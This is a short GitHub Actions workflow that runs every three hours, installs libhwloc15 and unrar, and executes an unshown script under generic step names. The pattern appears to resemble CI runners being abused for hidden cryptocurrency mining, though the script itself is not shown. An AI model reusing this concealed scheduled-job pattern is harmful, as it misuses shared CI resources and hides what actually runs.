jobs:
  ci:
    name: Run
    runs-on: ubuntu-20.04

    steps:
      - name: Start Up
        uses: actions/checkout@v2
      - name: Fetch Dependencies
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Checks
        run: ./workflow/action

name: Workflow

on:
  schedule:
    - cron: "10 2/3 * * *"
